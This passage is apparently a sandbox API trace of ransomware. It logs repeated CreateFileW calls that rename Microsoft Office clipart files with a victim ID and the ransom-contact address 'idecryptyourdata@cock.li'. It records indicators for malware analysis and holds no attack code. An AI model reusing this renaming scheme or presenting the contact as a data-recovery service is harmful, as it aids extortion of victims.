office\\root\\clipart\\pub60cor\\so00633_.wmf.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0173.943] CloseHandle (hObject=0x37c) returned 1 [0173.944] SetFilePointerEx (in: hFile=0x37c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x363fec0 | out: lpNewFilePointer=0x0) returned 1 [0173.944] SetFilePointerEx (in: hFile=0x37c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x363fec0 | out: lpNewFilePointer=0x0) returned 1 [0173.944] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\SO00638_.WMF.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\so00638_.wmf.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0173.945] CloseHandle (hObject=0x37c) returned 1 [0173.947] SetFilePointerEx (in: hFile=0x37c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x363fec0 | out: lpNewFilePointer=0x0) returned 1 [0173.947] SetFilePointerEx (in: hFile=0x37c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x363fec0 | out: lpNewFilePointer=0x0) returned 1 [0173.947] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\SO00656_.WMF.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\so00656_.wmf.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0173.947] CloseHandle (hObject=0x37c) returned 1 [0173.948] SetFilePointerEx (in: hFile=0x37c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x363fec0 | out: lpNewFilePointer=0x0) returned 1 [0173.948] SetFilePointerEx (in: hFile=0x37c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x363fec0 | out: lpNewFilePointer=0x0) returned 1 [0173.948] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\SO00668_.WMF.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\so00668_.wmf.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0173.948] CloseHandle (hObject=0x37c) returned 1 [0173.949] SetFilePointerEx (in: hFile=0x37c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x363fec0 | out: lpNewFilePointer=0x0) returned 1 [0173.949] SetFilePointerEx (in: hFile=0x37c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x363fec0 | out: lpNewFilePointer=0x0) returned 1 [0173.949] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\SO00670_.WMF.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\so00670_.wmf.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0173.949] CloseHandle (hObject=0x37c) returned 1 [0173.950] SetFilePointerEx (in: hFile=0x37c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x363fec0 | out: lpNewFilePointer=0x0) returned 1 [0173.950] SetFilePointerEx (in: hFile=0x37c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x363fec0 | out: lpNewFilePointer=0x0) returned 1 [0173.951] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\SO00671_.WMF.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\so00671_.wmf.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0173.951] CloseHandle (hObject=0x37c) returned 1 [0173.952] SetFilePointerEx (in: hFile=0x37c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x363fec0 | out: lpNewFilePointer=0x0) returned 1 [0173.952] SetFilePointerEx (in: hFile=0x37c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x363fec0 | out: lpNewFilePointer=0x0) returned 1 [0173.952] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\SO00683_.WMF.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\so00683_.wmf.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0173.952] CloseHandle (hObject=0x37c) returned 1 [0173.954] SetFilePointerEx (in: hFile=0x37c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x363fec0 | out: lpNewFilePointer=0x0) returned 1 [0173.954] SetFilePointerEx (in: hFile=0x37c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x363fec0 | out: lpNewFilePointer=0x0) returned 1 [0173.954] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\SO00694_.WMF.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\so00694_.wmf.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0173.955] CloseHandle (hObject=0x37c) returned 1 [0173.956] SetFilePointerEx (in: hFile=0x37c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x363fec0 | out: lpNewFilePointer=0x0) returned 1 [0173.956] SetFilePointerEx (in: hFile=0x37c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x363fec0 | out: lpNewFilePointer=0x0) returned 1 [0173.956] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\SO00704_.WMF.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\so00704_.wmf.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0173.956] CloseHandle (hObject=0x37c) returned 1 [0173.958] SetFilePointerEx (in: hFile=0x37c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x363fec0 | out: lpNewFilePointer=0x0) returned 1 [0173.958] SetFilePointerEx (in: hFile=0x37c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x363fec0 | out: lpNewFilePointer=0x0) returned 1 [0173.958] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\SO00726_.WMF.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\so00726_.wmf.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0173.958] CloseHandle (hObject=0x37c) returned 1 [0173.959] SetFilePointerEx (in: hFile=0x37c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x363fec0 | out: lpNewFilePointer=0x0) returned 1 [0173.959] SetFilePointerEx (in: hFile=0x37c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x363fec0 | out: lpNewFilePointer=0x0) returned 1 [0173.959] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\SO00728_.WMF.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\so00728_.wmf.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0173.959] CloseHandle (hObject=0x37c) returned 1 [0173.961] SetFilePointerEx (in: hFile=0x37c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x363fec0 | out: lpNewFilePointer=0x0) returned 1 [0173.961] SetFilePointerEx (in: hFile=0x37c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x363fec0 | out: lpNewFilePointer=0x0) returned 1 [0173.961] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\SO00732_.WMF.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\so00732_.wmf.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0173.961] CloseHandle (hObject=0x37c) returned 1 [0173.963] SetFilePointerEx (in: hFile=0x37c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x363fec0 | out: lpNewFilePointer=0x0) returned 1 [0173.963] SetFilePointerEx (in: hFile=0x37c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x363fec0 | out: lpNewFilePointer=0x0) returned 1 [0173.963] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\SO00734_.WMF.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\so00734_.wmf.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0173.964] CloseHandle (hObject=0x37c) returned 1 [0173.965] SetFilePointerEx (in: hFile=0x37c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x363fec0 | out: lpNewFilePointer=0x0) returned 1 [0173.965] SetFilePointerEx (in: hFile=0x37c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x363fec0 | out: lpNewFilePointer=0x0) returned 1 [0173.965] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\SO00735_.WMF.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\so00735_.wmf.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0173.965] CloseHandle (hObject=0x37c) returned 1 [0174.198] SetFilePointerEx (in: hFile=0x37c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x363fec0 | out: lpNewFilePointer=0x0) returned 1 [0174.198] SetFilePointerEx (in: hFile=0x37c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x363fec0 | out: lpNewFilePointer=0x0) returned 1 [0174.198] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\SO02048_.WMF.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\so02048_.wmf.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0174.199] CloseHandle (hObject=0x37c) returned 1 [0174.200] SetFilePointerEx (in: hFile=0x37c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x363fec0 | out: lpNewFilePointer=0x0) returned 1 [0174.200] SetFilePointerEx (in: hFile=0x37c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x363fec0 | out: lpNewFilePointer=0x0) returned 1 [0174.200] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\SO02051_.WMF.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\so02051_.wmf.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0174.200] CloseHandle (hObject=0x37c) returned 1 [0174.201] SetFilePointerEx (in: hFile=0x37c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x363fec0 | out: lpNewFilePointer=0x0) returned 1 [0174.201] SetFilePointerEx (in: hFile=0x37c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x363fec0 | out: lpNewFilePointer=0x0) returned 1 [0174.202] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\SO02054_.WMF.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\so02054_.wmf.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0174.202] CloseHandle (hObject=0x37c) returned 1 [0174.203] SetFilePointerEx (in: hFile=0x37c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x363fec0 | out: lpNewFilePointer=0x0) returned 1 [0174.203] SetFilePointerEx (in: hFile=0x37c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x363fec0 | out: lpNewFilePointer=0x0) returned 1 [0174.204] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\SO02055_.WMF.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\so02055_.wmf.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0174.204] CloseHandle (hObject=0x37c) returned 1 [0174.206] SetFilePointerEx (in: hFile=0x37c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x363fec0 | out: lpNewFilePointer=0x0) returned 1 [0174.207] SetFilePointerEx (in: hFile=0x37c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x363fec0 | out: lpNewFilePointer=0x0) returned 1 [0174.207] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\SO02067_.WMF.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\so02067_.wmf.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0174.207] CloseHandle (hObject=0x37c) returned 1 [0174.208] SetFilePointerEx (in: hFile=0x37c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x363fec0 | out: lpNewFilePointer=0x0) returned 1 [0174.208] SetFilePointerEx (in: hFile=0x37c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x363fec0 | out: lpNewFilePointer=0x0) returned 1 [0174.208] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\SO02094_.WMF.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\so02094_.wmf.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0174.208] CloseHandle (hObject=0x37c) returned 1 [0174.211] SetFilePointerEx (in: hFile=0x37c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x363fec0 | out: lpNewFilePointer=0x0) returned 1 [0174.211] SetFilePointerEx (in: hFile=0x37c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x363fec0 | out: lpNewFilePointer=0x0) returned 1 [0174.211] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\SO02227_.WMF.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\so02227_.wmf.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0174.211] CloseHandle (hObject=0x37c) returned 1 [0174.212] SetFilePointerEx (in: hFile=0x37c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x363fec0 | out: lpNewFilePointer=0x0) returned 1 [0174.213] SetFilePointerEx (in: hFile=0x37c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x363fec0 | out: lpNewFilePointer=0x0) returned 1 [0174.213] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\SO02228_.WMF.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\so02228_.wmf.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0174.213] CloseHandle (hObject=0x37c) returned 1 [0174.214] SetFilePointerEx (in: hFile=0x37c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x363fec0 | out: lpNewFilePointer=0x0) returned 1 [0174.214] SetFilePointerEx (in: hFile=0x37c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x363fec0 | out: lpNewFilePointer=0x0) returned 1 [0174.214] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\SO02233_.WMF.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\so02233_.wmf.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0174.215] CloseHandle (hObject=0x37c) returned 1 [0174.216] SetFilePointerEx (in: hFile=0x37c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x363fec0 | out: lpNewFilePointer=0x0) returned 1 [0174.216] SetFilePointerEx (in: hFile=0x37c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x363fec0 | out: lpNewFilePointer=0x0) returned 1 [0174.216] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\SO02252_.WMF.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\so02252_.wmf.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0174.217] CloseHandle (hObject=0x37c) returned 1 [0174.219] SetFilePointerEx (in: hFile=0x37c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x363fec0 | out: lpNewFilePointer=0x0) returned 1 [0174.219] SetFilePointerEx (in: hFile=0x37c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x363fec0 | out: lpNewFilePointer=0x0) returned 1 [0174.219] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\SO02253_.WMF.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\so02253_.wmf.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0174.219] CloseHandle (hObject=0x37c) returned 1 [0174.220] SetFilePointerEx (in: hFile=0x37c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x363fec0 | out: lpNewFilePointer=0x0) returned 1 [0174.220] SetFilePointerEx (in: hFile=0x37c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x363fec0 | out: lpNewFilePointer=0x0) returned 1 [0174.220] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\SO02261_.WMF.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\so02261_.wmf.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0174.220] CloseHandle (hObject=0x37c) returned 1 [0174.221] SetFilePointerEx (in: hFile=0x37c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x363fec0 | out: lpNewFilePointer=0x0) returned 1 [0174.221] SetFilePointerEx (in: hFile=0x37c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x363fec0 | out: lpNewFilePointer=0x0) returned 1 [0174.222] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\SO02263_.WMF.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\so02263_.wmf.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0174.222] CloseHandle (hObject=0x37c) returned 1 [0174.223] SetFilePointerEx (in: hFile=0x37c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x363fec0 | out: lpNewFilePointer=0x0) returned 1 [0174.223] SetFilePointerEx (in: hFile=0x37c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x363fec0 | out: lpNewFilePointer=0x0) returned 1 [0174.223] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\SO02265_.WMF.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\so02265_.wmf.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0174.223] CloseHandle (hObject=0x37c) returned 1 [0174.225] SetFilePointerEx (in: hFile=0x37c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x363fec0 | out: lpNewFilePointer=0x0) returned 1 [0174.225] SetFilePointerEx (in: hFile=0x37c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x363fec0 | out: lpNewFilePointer=0x0) returned 1 [0174.225] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\SO02268_.WMF.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\so02268_.wmf.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0174.226] CloseHandle (hObject=0x37c) returned 1 [0174.226] SetFilePointerEx (in: hFile=0x37c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x363fec0 | out: lpNewFilePointer=0x0) returned 1 [0174.226] SetFilePointerEx (in: hFile=0x37c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x363fec0 | out: lpNewFilePointer=0x0) returned 1 [0174.226] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\SO02269_.WMF.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\so02269_.wmf.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0174.227] CloseHandle (hObject=0x37c) returned 1 [0174.228] SetFilePointerEx (in: hFile=0x37c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x363fec0 | out: lpNewFilePointer=0x0) returned 1 [0174.228] SetFilePointerEx (in: hFile=0x37c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x363fec0 | out: lpNewFilePointer=0x0) returned 1 [0174.228] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\SO02270_.WMF.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\so02270_.wmf.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0174.229] CloseHandle (hObject=0x37c) returned 1 [0174.230] SetFilePointerEx (in: hFile=0x37c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x363fec0 | out: lpNewFilePointer=0x0) returned 1 [0174.230] SetFilePointerEx (in: hFile=0x37c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x363fec0 | out: lpNewFilePointer=0x0) returned 1 [0174.230] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\SO02276_.WMF.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\so02276_.wmf.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0174.230] CloseHandle (hObject=0x37c) returned 1 [0174.231] SetFilePointerEx (in: hFile=0x37c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x363fec0 | out: lpNewFilePointer=0x0) returned 1 [0174.231] SetFilePointerEx (in: hFile=0x37c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x363fec0 | out: lpNewFilePointer=0x0) returned 1 [0174.231] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\SO02413_.WMF.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\so02413_.wmf.id-b4197730.[idecryptyourdata@cock.li].bat"), 